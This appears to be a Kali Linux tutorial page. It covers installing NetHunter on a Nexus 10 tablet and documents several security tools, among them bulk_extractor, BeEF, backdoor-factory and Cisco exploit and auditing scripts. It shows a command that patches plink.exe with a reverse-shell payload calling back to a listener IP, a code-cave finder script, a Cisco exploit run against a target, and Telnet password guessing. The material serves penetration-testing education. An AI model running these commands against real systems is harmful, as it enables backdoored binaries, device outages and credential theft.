Installing Kali NetHunter on Nexus 10 Tablet

Installation using a Windows PC

  1. If you already have a rooted device with a custom recovery such as TWRP installed, skip to step 22 (flashing the NetHunter zip needs a custom recovery, not just root)
  2. Download the Android SDK package from https://developer.android.com/sdk/index.html
  3. Install the SDK to the computer that will be rooting the device
  4. Open Android Studio and navigate to SDK Manager > SDK Tools and install the Google USB Driver if it isn’t installed already
  5. Note down the SDK’s platform-tools path (this is where adb.exe and fastboot.exe live); it should look something like C:\Users\XXXXXX\AppData\Local\Android\sdk\platform-tools
  6. Right-click on My Computer, select Properties > Advanced system settings > Environment variables
  7. Find the ‘Path’ variable under ‘System variables’, select ‘Edit’, add a semi-colon to the end of what’s there, followed by the SDK tools path. (If the Path variable doesn’t exist, create it and set it as the SDK tools path)
  8. On the tablet navigate to Settings > About, then tap on ‘Build number’ 7 times to activate Developer Mode
  9. Navigate back to Settings, then Developer Options and enable USB debugging
  10. If it isn’t already, connect the tablet to the PC that has the SDK installed
  11. Open Device Manager, select the device, right-click and then navigate to Properties > Driver > Update Driver > Browse my computer for driver software > Browse…
  12. Set the directory to the SDK directory, followed by \extras\google\usb_driver
  13. Select ‘Next’ and the device should then be recognised as an Android/Nexus device
  14. Repeat steps 11-13 for any Android/Nexus devices without drivers
  15. Open up a command prompt window (cmd), reboot the tablet into the bootloader and then unlock it. Unlocking the bootloader performs a factory reset, so back up anything you need on the tablet first, and confirm the unlock prompt on the tablet’s screen when it appears. The reboot must come first, because fastboot only talks to a device that is already in the bootloader:
    adb reboot-bootloader
    fastboot oem unlock
  16. Go to https://twrp.me/devices/samsungnexus10.html and download the most recent TWRP image for the Nexus 10 tablet (2.8.7.0 manta as of now)
  17. Navigate to where the image is downloaded to in the command prompt window, and then run:
    fastboot flash recovery twrp-2.8.7.0-manta.img
  18. Go to https://autoroot.chainfire.eu/ and download the rooter for the Nexus 10 manta
  19. Extract the downloaded ZIP, navigate to the folder in the command prompt window and then run:
    root-windows.bat
  20. Follow the instructions on screen, read carefully before accepting
  21. The device should now be rooted and ready to install Kali NetHunter
  22. Go to https://www.offensive-security.com/kali-linux-nethunter-download/ and download the Kali NetHunter for Nexus 10 for your Android version
  23. Make sure the device is still connected, then in a command prompt window run the following command, making sure to replace the directory and file name correctly:
    adb push C:/Users/XXXXXX/Downloads/kali_nethunter.zip /data/local/tmp/kali_nethunter.zip
  24. Once that is complete, put the tablet back into bootloader mode by running:
    adb reboot-bootloader
  25. Use the volume +/- buttons to change the boot option to ‘Recovery Mode’, and then press the power button to select it
  26. Select ‘Install’, navigate to the root directory and then /data/local/tmp
  27. Select the Kali NetHunter zip, and then begin the flash
  28. Once the Kali NetHunter installation is complete, press ‘Reboot System’ to reboot the device
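Steps 22-24 above, for a tablet that is already rooted, as a script with the checks a practitioner wants before pushing anything. This is an added example, not part of the NetHunter project or of the original guide. It needs adb on PATH (step 7), reads the output of adb devices so a missing driver or an unaccepted USB-debugging prompt is reported instead of failing silently, compares the zip against a SHA-256 (EXPECTED_SHA256 is a placeholder; use the checksum published with the download, if one is), then pushes the zip and reboots straight into recovery with adb reboot recovery, which replaces the volume-button step 25. The device serial in the comments is made up.

```python
"""Pre-flight checks for steps 22-24 (push the NetHunter zip, reboot to recovery).
Added example, not from the NetHunter project. Assumes adb is on PATH."""
import hashlib
import subprocess
import sys

EXPECTED_SHA256 = "0" * 64          # placeholder: paste the published checksum here
REMOTE_PATH = "/data/local/tmp/kali_nethunter.zip"   # same location the guide uses


def parse_device_list(text):
    """`adb devices` and `fastboot devices` both print one 'serial<TAB>state' line per
    device (e.g. 'R32D1234ABC\tdevice', a constructed serial). adb states are device,
    unauthorized and offline; fastboot prints 'fastboot'. Banner lines are skipped."""
    devices = []
    for line in text.splitlines():
        if line.startswith(("List of devices", "*")):
            continue
        parts = line.split()
        if len(parts) >= 2:
            devices.append((parts[0], parts[1]))
    return devices


def check_device(text, want_state):
    """Return (serial, None) when exactly one device is in the wanted state,
    otherwise (None, reason) naming the fix."""
    devices = parse_device_list(text)
    if not devices:
        return None, "no device listed: check the USB driver (steps 11-14) and the cable"
    if len(devices) > 1:
        return None, "more than one device attached: unplug the others"
    serial, state = devices[0]
    if state == "unauthorized":
        return None, "device is 'unauthorized': accept the USB debugging prompt on the tablet"
    if state != want_state:
        return None, f"device is in state '{state}', expected '{want_state}'"
    return serial, None


def sha256_of_file(path):
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 20), b""):
            h.update(chunk)
    return h.hexdigest()


def adb(serial, *args):
    argv = ["adb", "-s", serial, *args]
    print("+", " ".join(argv))
    subprocess.run(argv, check=True)


def main(zip_path):
    digest = sha256_of_file(zip_path)
    if digest != EXPECTED_SHA256:
        sys.exit(f"checksum mismatch ({digest}); re-download the zip before flashing")
    out = subprocess.run(["adb", "devices"], capture_output=True, text=True, check=True).stdout
    serial, problem = check_device(out, "device")
    if problem:
        sys.exit(problem)
    adb(serial, "push", zip_path, REMOTE_PATH)      # step 23
    adb(serial, "reboot", "recovery")                # steps 24-25 in one go; TWRP comes up


if __name__ == "__main__":
    main(sys.argv[1] if len(sys.argv) > 1 else r"C:\Users\XXXXXX\Downloads\kali_nethunter.zip")
```

Once TWRP is up, continue with step 26 (Install, /data/local/tmp). The checksum step matters because the zip is flashed by the recovery with no signature check of its own.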

Installing Kali Linux 2

Installing Kali in VM Fusion (Mac)

The following video shows the steps to install the base build of Kali Linux using VMware Fusion 8 Pro. It runs through a graphical installation from start to finish.

Video Tutorial

Updating Kali via Command Line

The following video shows how to update Kali Linux via the command line.

Video Tutorial

Installing VM Tools in Kali Linux

The following video shows how to install VM Tools into Kali Linux.

Video Tutorial

Capstone

Tool Description

Capstone is a disassembly framework with the target of becoming the ultimate disasm engine for binary analysis and reversing in the security community. Created by Nguyen Anh Quynh, then developed and maintained by a small community, Capstone offers some unparalleled features:

  • Supports multiple hardware architectures: ARM, ARM64 (aka ARMv8), MIPS & x86
  • Clean, simple, lightweight, intuitive, architecture-neutral API
  • Provides details on the disassembled instruction (called a “decomposer” by others)
  • Provides semantics of the disassembled instruction, such as the list of implicit registers read & written
  • Implemented in pure C, with lightweight wrappers for C++, Python, Ruby, OCaml, C#, Java and Go available
  • Native support for Windows & *nix platforms (Mac OS X, Linux & *BSD confirmed)
  • Thread-safe by design.

Tool Source: http://www.capstone-engine.org/index.html

Kali Repo: http://git.kali.org/gitweb/?p=packages/capstone.git;a=summary

Video Tutorial: Coming Soon!

bulk-extractor – Extracts information without parsing filesystem

Tool Description

bulk_extractor is a program that extracts features such as email addresses, credit card numbers, URLs, and other types of information from digital evidence files. It is a useful forensic investigation tool for many tasks such as malware and intrusion investigations, identity investigations and cyber investigations, as well as analyzing imagery and password cracking. The program provides several unusual capabilities including:

  • It finds email addresses, URLs and credit card numbers that other tools miss because it can process compressed data (like ZIP, PDF and GZIP files) and incomplete or partially corrupted data. It can carve JPEGs, office documents and other kinds of files out of fragments of compressed data. It will detect and carve encrypted RAR files.
  • It builds word lists based on all of the words found within the data, even those in compressed files that are in unallocated space. Those word lists can be useful for password cracking.
  • It is multi-threaded; running bulk_extractor on a computer with twice the number of cores typically makes it complete a run in half the time.
  • It creates histograms showing the most common email addresses, URLs, domains, search terms and other kinds of information on the drive.

bulk_extractor operates on disk images, files or a directory of files and extracts useful information without parsing the file system or file system structures. The input is split into pages and processed by one or more scanners. The results are stored in feature files that can be easily inspected, parsed, or processed with other automated tools.
bulk_extractor also creates histograms of features that it finds. This is useful because features such as email addresses and internet search terms that are more common tend to be important.
In addition to the capabilities described above, bulk_extractor also includes:

  • A graphical user interface, Bulk Extractor Viewer, for browsing features stored in feature files and for launching bulk_extractor scans
  • A small number of python programs for performing additional analysis on feature files

Tool Source: https://github.com/simsong/bulk_extractor/

Kali Repo: http://git.kali.org/gitweb/?p=packages/bulk-extractor.git;a=summary

General Details

root@kali:~# bulk_extractor
bulk_extractor version 1.3 $Rev: 10606 $
Usage: bulk_extractor [options] imagefile
  runs bulk extractor and outputs to stdout a summary of what was found where

Required parameters:
   imagefile     - the file to extract
 or  -R filedir  - recurse through a directory of files
                  SUPPORT FOR E01 FILES COMPILED IN
                  SUPPORT FOR AFF FILES COMPILED IN
   -o outdir    - specifies output directory. Must not exist.
                  bulk_extractor creates this directory.
Options:
   -b banner.txt- Add banner.txt contents to the top of every output file.
   -r alert_list.txt  - a file containing the alert list of features to alert
                       (can be a feature file or a list of globs)
                       (can be repeated.)
   -w stop_list.txt   - a file containing the stop list of features (white list
                       (can be a feature file or a list of globs)s
                       (can be repeated.)
   -F <rfile>   - Read a list of regular expressions from <rfile> to find
   -f <regex>   - find occurrences of <regex>; may be repeated.
                  results go into find.txt
   -q nn        - Quiet Rate; only print every nn status reports. Default 0; -1 for no status at all

Tuning parameters:
   -C NN         - specifies the size of the context window (default 16)
   -G NN         - specify the page size (default 16777216)
   -g NN         - specify margin (default 4194304)
   -W n1:n2      - Specifies minimum and maximum word size
                  (default is -w6:14)
   -B NN         - Specify the blocksize for bulk data analysis (default 512)
   -j NN         - Number of analysis threads to run (default 2)
   -M nn        - sets max recursion depth (default 5)

Path Processing Mode:
   -p <path>/f  - print the value of <path> with a given format.
                  formats: r = raw; h = hex.
                  Specify -p - for interactive mode.
                  Specify -p -http for HTTP mode.

Parallelizing:
   -Y <o1>      - Start processing at o1 (o1 may be 1, 1K, 1M or 1G)
   -Y <o1>-<o2> - Process o1-o2
   -A <off>     - Add <off> to all reported feature offsets

Debugging:
   -h           - print this message
   -H           - print detailed info on the scanners
   -V           - print version number
   -z nn        - start on page nn
   -dN          - debug mode (see source code
   -Z           - zap (erase) output directory

Control of Scanners:
   -P <dir>     - Specifies a plugin directory
   -E scanner   - turn off all scanners except scanner
   -m <max>     - maximum number of minutes to wait for memory starvation
                  default is 60
   -s name=value - sets a bulk extractor option name to be value

   -e bulk - enable scanner bulk
   -e wordlist - enable scanner wordlist

   -x accts - disable scanner accts
   -x aes - disable scanner aes
   -x base16 - disable scanner base16
   -x base64 - disable scanner base64
   -x elf - disable scanner elf
   -x email - disable scanner email
   -x exif - disable scanner exif
   -x gps - disable scanner gps
   -x gzip - disable scanner gzip
   -x hiber - disable scanner hiber
   -x json - disable scanner json
   -x kml - disable scanner kml
   -x net - disable scanner net
   -x pdf - disable scanner pdf
   -x vcard - disable scanner vcard
   -x windirs - disable scanner windirs
   -x winpe - disable scanner winpe
   -x winprefetch - disable scanner winprefetch
   -x zip - disable scanner zip

Usage Example

Analyze the image file (xp-laptop-2005-07-04-1430.img) and write the feature files and histograms to the output directory (-o bulk-out); the directory must not already exist, bulk_extractor creates it:

root@kali:~# bulk_extractor -o bulk-out xp-laptop-2005-07-04-1430.img 
bulk_extractor version: 1.3
Hostname: kali
Input file: xp-laptop-2005-07-04-1430.img
Output directory: bulk-out
Disk Size: 536715264
Threads: 1
Phase 1.
13:02:46 Offset 0MB (0.00%) Done in n/a at 13:02:45
13:03:39 Offset 67MB (12.50%) Done in  0:06:14 at 13:09:53
13:04:43 Offset 134MB (25.01%) Done in  0:05:50 at 13:10:33
13:04:55 Offset 201MB (37.51%) Done in  0:03:36 at 13:08:31
13:06:01 Offset 268MB (50.01%) Done in  0:03:15 at 13:09:16
13:06:48 Offset 335MB (62.52%) Done in  0:02:25 at 13:09:13
13:07:04 Offset 402MB (75.02%) Done in  0:01:25 at 13:08:29
13:07:20 Offset 469MB (87.53%) Done in  0:00:39 at 13:07:59
All Data is Read; waiting for threads to finish...
Time elapsed waiting for 1 thread to finish:
     (please wait for another 60 min .)
Time elapsed waiting for 1 thread to finish:
    6 sec (please wait for another 59 min 54 sec.)
Thread 0: Processing 520093696

Time elapsed waiting for 1 thread to finish:
    12 sec (please wait for another 59 min 48 sec.)
Thread 0: Processing 520093696

Time elapsed waiting for 1 thread to finish:
    18 sec (please wait for another 59 min 42 sec.)
Thread 0: Processing 520093696

Time elapsed waiting for 1 thread to finish:
    24 sec (please wait for another 59 min 36 sec.)
Thread 0: Processing 520093696

Time elapsed waiting for 1 thread to finish:
    30 sec (please wait for another 59 min 30 sec.)
Thread 0: Processing 520093696

All Threads Finished!
Producer time spent waiting: 335.984 sec.
Average consumer time spent waiting: 0.143353 sec.
*******************************************
** bulk_extractor is probably CPU bound. **
**    Run on a computer with more cores  **
**      to get better performance.       **
*******************************************
Phase 2. Shutting down scanners
Phase 3. Creating Histograms
   ccn histogram...   ccn_track2 histogram...   domain histogram...
   email histogram...   ether histogram...   find histogram...
   ip histogram...   tcp histogram...   telephone histogram...
   url histogram...   url microsoft-live...   url services...
   url facebook-address...   url facebook-id...   url searches...

Elapsed time: 378.5 sec.
Overall performance: 1.418 MBytes/sec.
Total email features found: 899

Video Tutorial: Coming Soon!

BeEF – Browser exploitation framework

Tool Description

BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.

Amid growing concerns about web-borne attacks against clients, including mobile clients, BeEF allows the professional penetration tester to assess the actual security posture of a target environment by using client-side attack vectors. Unlike other security frameworks, BeEF looks past the hardened network perimeter and client system, and examines exploitability within the context of the one open door: the web browser. BeEF will hook one or more web browsers and use them as beachheads for launching directed command modules and further attacks against the system from within the browser context.

Tool Source: http://beefproject.com/

Kali Repo: http://git.kali.org/gitweb/?p=packages/beef-xss.git;a=summary

Video Tutorial: Coming Soon!

 

backdoor-factory – Patch win32/64 binaries with shellcode

Tool Description

The goal of BDF is to patch executable binaries with user-supplied shellcode while letting the binary continue its normal execution as if it had not been patched.

Supported: Windows PE x32/x64 and Linux ELF x32/x64 (System V).

Some executables have built-in protections, so this will not work on all binaries. Test target binaries before deploying them to clients or using them in exercises.

Tool Source: https://github.com/secretsquirrel/the-backdoor-factory/

Kali Repo: http://git.kali.org/gitweb/?p=packages/backdoor-factory.git;a=summary

General Details

root@kali:~# backdoor-factory
-.(`-')  (`-')  _           <-.(`-') _(`-')                            (`-')
__( OO)  (OO ).-/  _         __( OO)( (OO ).->     .->        .->   <-.(OO )
'-'---.\  / ,---.   \-,-----.'-'. ,--.\    .'_ (`-')----. (`-')----. ,------,)
| .-. (/  | \ /`.\   |  .--./|  .'   /'`'-..__)( OO).-.  '( OO).-.  '|   /`. '
| '-' `.) '-'|_.' | /_) (`-')|      /)|  |  ' |( _) | |  |( _) | |  ||  |_.' |
| /`'.  |(|  .-.  | ||  |OO )|  .   ' |  |  / : \|  |)|  | \|  |)|  ||  .   .'
| '--'  / |  | |  |(_'  '--'\|  |\   \|  '-'  /  '  '-'  '  '  '-'  '|  |\  \
`------'  `--' `--'   `-----'`--' '--'`------'    `-----'    `-----' `--' '--'
           (`-')  _           (`-')                   (`-')
   <-.     (OO ).-/  _        ( OO).->       .->   <-.(OO )      .->
(`-')-----./ ,---.   \-,-----./    '._  (`-')----. ,------,) ,--.'  ,-.
(OO|(_\---'| \ /`.\   |  .--./|'--...__)( OO).-.  '|   /`. '(`-')'.'  /
 / |  '--. '-'|_.' | /_) (`-')`--.  .--'( _) | |  ||  |_.' |(OO \    /
 \_)  .--'(|  .-.  | ||  |OO )   |  |    \|  |)|  ||  .   .' |  /   /)
  `|  |_)  |  | |  |(_'  '--'\   |  |     '  '-'  '|  |\  \  `-/   /`
   `--'    `--' `--'   `-----'   `--'      `-----' `--' '--'   `--'

         Author:    Joshua Pitts
         Email:     the.midnite.runr[a t]gmail<d o t>com
         Twitter:   @midnite_runr

         v2.0.6

Usage: backdoor.py [options]

Options:
  -h, --help            show this help message and exit
  -f FILE, --file=FILE  File to backdoor
  -s SHELL, --shell=SHELL
                        Payloads that are available for use.
  -H HOST, --hostip=HOST
                        IP of the C2 for reverse connections
  -P PORT, --port=PORT  The port to either connect back to for reverse shells
                        or to listen on for bind shells
  -J, --cave_jumping    Select this options if you want to use code cave
                        jumping to further hide your shellcode in the binary.
  -a, --add_new_section
                        Mandating that a new section be added to the exe
                        (better success) but less av avoidance
  -U SUPPLIED_SHELLCODE, --user_shellcode=SUPPLIED_SHELLCODE
                        User supplied shellcode, make sure that it matches the
                        architecture that you are targeting.
  -c, --cave            The cave flag will find code caves that can be used
                        for stashing shellcode. This will print to all the
                        code caves of a specific size.The -l flag can be use
                        with this setting.
  -l SHELL_LEN, --shell_length=SHELL_LEN
                        For use with -c to help find code caves of different
                        sizes
  -o OUTPUT, --output-file=OUTPUT
                        The backdoor output file
  -n NSECTION, --section=NSECTION
                        New section name must be less than seven characters
  -d DIR, --directory=DIR
                        This is the location of the files that you want to
                        backdoor. You can make a directory of file backdooring
                        faster by forcing the attaching of a codecave to the
                        exe by using the -a setting.
  -w, --change_access   This flag changes the section that houses the codecave
                        to RWE. Sometimes this is necessary. Enabled by
                        default. If disabled, the backdoor may fail.
  -i, --injector        This command turns the backdoor factory in a hunt and
                        shellcode inject type of mechinism. Edit the target
                        settings in the injector module.
  -u SUFFIX, --suffix=SUFFIX
                        For use with injector, places a suffix on the original
                        file for easy recovery
  -D, --delete_original
                        For use with injector module.  This command deletes
                        the original file.  Not for use in production systems.
                        *Author not responsible for stupid uses.*
  -O DISK_OFFSET, --disk_offset=DISK_OFFSET
                        Starting point on disk offset, in bytes. Some authors
                        want to obfuscate their on disk offset to avoid
                        reverse engineering, if you find one of those files
                        use this flag, after you find the offset.
  -S, --support_check   To determine if the file is supported by BDF prior to
                        backdooring the file. For use by itself or with
                        verbose. This check happens automatically if the
                        backdooring is attempted.
  -q, --no_banner       Kills the banner.
  -v, --verbose         For debug information output.

Usage Example

Specify the binary to backdoor (-f /usr/share/windows-binaries/plink.exe), set the connect-back IP (-H 192.168.1.202), the connect-back port (-P 4444), and the shell to use (-s reverse_shell_tcp). BDF lists the code caves large enough for the shellcode and asks you to pick one; the patched copy is written to a ‘backdoored’ directory under the current working directory and the original file is not modified. Have a listener on 192.168.1.202:4444 running before the patched binary is executed, and test the result first, as the description above advises:

root@kali:~# backdoor-factory -f /usr/share/windows-binaries/plink.exe -H 192.168.1.202 -P 4444 -s reverse_shell_tcp
__________                __       .___                   
\______   \_____    ____ |  | __ __| _/____   ___________ 
 |    |  _/\__  \ _/ ___\|  |/ // __ |/  _ \ /  _ \_  __ \ 
 |    |   \ / __ \\  \___|    </ /_/ (  <_> |  <_> )  | \/
 |______  /(____  /\___  >__|_ \____ |\____/ \____/|__|   
        \/      \/     \/     \/    \/                    
___________              __                               
\_   _____/____    _____/  |_  ___________ ___.__.        
 |    __) \__  \ _/ ___\   __\/  _ \_  __ <   |  |        
 |     \   / __ \\  \___|  | (  <_> )  | \/\___  |        
 \___  /  (____  /\___  >__|  \____/|__|   / ____|        
     \/        \/     \/                   \/             

         Author:    Joshua Pitts
         Email:     the.midnite.runr[a t]gmail<d o t>com
         Twitter:   @midnite_runr
         
         v2.0.6 
         
[*] In the backdoor module
[*] Checking if binary is supported
[*] Gathering file info
[*] Reading win32 entry instructions
[*] Looking for and setting selected shellcode
[*] Creating win32 resume execution stub
[*] Looking for caves that will fit the minimum shellcode length of 358
[*] All caves lengths:  (358,)
############################################################
The following caves can be used to inject code and possibly
continue execution.
**Don't like what you see? Use jump, single, or append.**
############################################################
[*] Cave 1 length as int: 358
[*] Available caves: 
1. Section Name: None; Section Begin: None End: None; Cave begin: 0x280 End: 0x1000; Cave Size: 3456
2. Section Name: .text; Section Begin: 0x1000 End: 0x37000; Cave begin: 0x36981 End: 0x37000; Cave Size: 1663
3. Section Name: None; Section Begin: None End: None; Cave begin: 0x47cec End: 0x48004; Cave Size: 792
4. Section Name: .data; Section Begin: 0x48000 End: 0x4a000; Cave begin: 0x48961 End: 0x48b90; Cave Size: 559
5. Section Name: None; Section Begin: None End: None; Cave begin: 0x4907c End: 0x4a00e; Cave Size: 3986
**************************************************
[!] Enter your selection: 2
Using selection: 2
[*] Changing Section Flags
[*] Patching initial entry instructions
[*] Creating win32 resume execution stub
[*] /usr/share/windows-binaries/plink.exe backdooring complete
File /usr/share/windows-binaries/plink.exe is in the 'backdoored' directory
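What the cave listing above is built from, as a small code-cave finder for PE files. This is an added example, not backdoor-factory’s code: it parses the PE section table, finds runs of null bytes at least as long as the shellcode (the -l value), and credits each run to the section that contains it, with None for header padding and inter-section slack, which is the same distinction the listing above makes. The PE it runs on is a constructed 32-bit image assembled in memory, so the script works offline; flags() and make_rwe() show the effect the help text attributes to --change_access (the section housing the cave made RWE).

```python
"""Toy code-cave finder in the style of backdoor-factory's -c/-l listing.
Added example, not BDF's code; build_sample_pe() is a constructed PE32 image."""
import struct

IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ = 0x40000000
IMAGE_SCN_MEM_WRITE = 0x80000000
SECTION_HDR = struct.Struct("<8sIIIIIIHHI")   # IMAGE_SECTION_HEADER, 40 bytes


def parse_sections(pe):
    """[(name, raw_begin, raw_end, characteristics)] from the PE section table."""
    if pe[:2] != b"MZ":
        raise ValueError("no MZ header")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("no PE signature")
    coff = e_lfanew + 4
    nsections = struct.unpack_from("<H", pe, coff + 2)[0]
    opt_size = struct.unpack_from("<H", pe, coff + 16)[0]
    table = coff + 20 + opt_size
    out = []
    for i in range(nsections):
        name, _vsize, _va, rawsize, rawptr, _, _, _, _, chars = SECTION_HDR.unpack_from(pe, table + i * SECTION_HDR.size)
        out.append((name.rstrip(b"\0").decode("ascii", "replace"), rawptr, rawptr + rawsize, chars))
    return out


def find_caves(pe, min_len):
    """Runs of >= min_len null bytes. A run wholly inside a section is credited to it;
    header padding and slack between sections come back with section None."""
    sections = parse_sections(pe)
    caves, i = [], 0
    while i < len(pe):
        if pe[i] != 0:
            i += 1
            continue
        j = i
        while j < len(pe) and pe[j] == 0:
            j += 1
        if j - i >= min_len:
            sec = next((s for s in sections if s[1] <= i and j <= s[2]), None)
            caves.append({"section": sec[0] if sec else None,
                          "sec_begin": sec[1] if sec else None, "sec_end": sec[2] if sec else None,
                          "begin": i, "end": j, "size": j - i, "chars": sec[3] if sec else None})
        i = j
    return caves


def flags(chars):
    """'RWE'-style summary of a section's memory flags."""
    return "".join(c if chars & bit else "-" for c, bit in
                   (("R", IMAGE_SCN_MEM_READ), ("W", IMAGE_SCN_MEM_WRITE), ("E", IMAGE_SCN_MEM_EXECUTE)))


def make_rwe(chars):
    """Section flags after the change the help text describes for --change_access."""
    return chars | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE | IMAGE_SCN_MEM_EXECUTE


def report(caves):
    """Lines in the shape of the 'Available caves' listing."""
    hx = lambda v: "None" if v is None else hex(v)
    return [f"{n}. Section Name: {c['section']}; Section Begin: {hx(c['sec_begin'])} End: {hx(c['sec_end'])}; "
            f"Cave begin: {hx(c['begin'])} End: {hx(c['end'])}; Cave Size: {c['size']}"
            for n, c in enumerate(caves, 1)]


def build_sample_pe():
    """Constructed PE32: DOS header, PE headers, .text (code then a null tail), .data."""
    text_raw, data_raw, raw_size = 0x200, 0x400, 0x200
    sec_text = SECTION_HDR.pack(b".text", raw_size, 0x1000, raw_size, text_raw, 0, 0, 0, 0, 0x60000020)  # CODE|R|E
    sec_data = SECTION_HDR.pack(b".data", raw_size, 0x2000, raw_size, data_raw, 0, 0, 0, 0, 0xC0000040)  # IDATA|R|W
    dos = b"MZ" + b"\0" * 0x3A + struct.pack("<I", 0x40)                 # e_lfanew = 0x40
    coff = struct.pack("<HHIIIHH", 0x14C, 2, 0, 0, 0, 0xE0, 0x102)      # i386, 2 sections, PE32 optional header
    optional = struct.pack("<H", 0x10B) + b"\x01" * (0xE0 - 2)          # magic only; rest is filler, never parsed
    headers = dos + b"PE\0\0" + coff + optional + sec_text + sec_data
    headers += b"\0" * (text_raw - len(headers))                        # header padding: a cave with no section
    text = b"\x90" * 0x180 + b"\0" * 0x80                                # code, then a 128-byte null tail
    data = b"A" * 0x10 + b"\0" * 0x1F0                                   # 16 data bytes, then 496 nulls
    return headers + text + data


if __name__ == "__main__":
    pe = build_sample_pe()
    for line in report(find_caves(pe, 100)):
        print(line)
    for name, _, _, chars in parse_sections(pe):
        print(f"{name}: {flags(chars)} -> {flags(make_rwe(chars))} after --change_access")
```

With a 358-byte shellcode, as in the run above, only the .data cave qualifies here; a cave in a data section is exactly the case that needs the flag change, and a section reported as RWE is also the cheapest thing a defender can grep a sample for, since a compiler will not normally emit one.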

Video Tutorial: Coming Soon!

 

cisco-global-exploiter – Simple and fast security testing tool

Tool Description

Cisco Global Exploiter (CGE) is a simple and fast security testing tool: a Perl script that runs one of the old, well-known Cisco exploits listed below against a single target. Most of the entries are denial-of-service attacks that will take the device down, so run it only against devices you are authorised to disrupt.

Tool Source: http://www.blackangels.it/

Kali Repo: http://git.kali.org/gitweb/?p=packages/cisco-global-exploiter.git;a=summary

General Details

root@kali:~# cge.pl

Usage :
perl cge.pl <target> <vulnerability number>

Vulnerabilities list :
[1] - Cisco 677/678 Telnet Buffer Overflow Vulnerability
[2] - Cisco IOS Router Denial of Service Vulnerability
[3] - Cisco IOS HTTP Auth Vulnerability
[4] - Cisco IOS HTTP Configuration Arbitrary Administrative Access Vulnerability
[5] - Cisco Catalyst SSH Protocol Mismatch Denial of Service Vulnerability
[6] - Cisco 675 Web Administration Denial of Service Vulnerability
[7] - Cisco Catalyst 3500 XL Remote Arbitrary Command Vulnerability
[8] - Cisco IOS Software HTTP Request Denial of Service Vulnerability
[9] - Cisco 514 UDP Flood Denial of Service Vulnerability
[10] - CiscoSecure ACS for Windows NT Server Denial of Service Vulnerability
[11] - Cisco Catalyst Memory Leak Vulnerability
[12] - Cisco CatOS CiscoView HTTP Server Buffer Overflow Vulnerability
[13] - 0 Encoding IDS Bypass Vulnerability (UTF)
[14] - Cisco IOS HTTP Denial of Service Vulnerability

Usage Example

Attack the target host (192.168.99.230) using the Cisco IOS HTTP Auth Vulnerability (3):

root@kali:~# cge.pl 192.168.99.230 3

Vulnerability successful exploited with [http://192.168.99.230/level/17/exec/....] ...

Video Tutorial: Coming Soon!

cisco-auditing-tool – Scans Cisco routers for common vulnerabilities

Tool Description

A Perl script which scans Cisco routers for common vulnerabilities: Telnet password guessing and SNMP community-name guessing from wordlists, plus a check for the IOS history bug (see the options below).

Tool Source: http://www.scrypt.net/

Kali Repo: http://git.kali.org/gitweb/?p=packages/cisco-auditing-tool.git;a=summary

General Details

root@kali:~# CAT

Cisco Auditing Tool - g0ne [null0]
Usage:
    -h hostname (for scanning single hosts)
    -f hostfile (for scanning multiple hosts)
    -p port #   (default port is 23)
    -w wordlist (wordlist for community name guessing)
    -a passlist (wordlist for password guessing)
    -i [ioshist]    (Check for IOS History bug)
    -l logfile  (file to log to, default screen)
    -q quiet mode   (no screen output)

Usage Example

Scan the host (-h 192.168.99.230) on port 23 (-p 23), using a password dictionary file (-a /usr/share/wordlists/nmap.lst):

root@kali:~# CAT -h 192.168.99.230 -p 23 -a /usr/share/wordlists/nmap.lst 

Cisco Auditing Tool - g0ne [null0]

Checking Host: 192.168.99.230


Guessing passwords: 

Invalid Password: 123456
Invalid Password: 12345

Video Tutorial: Coming Soon!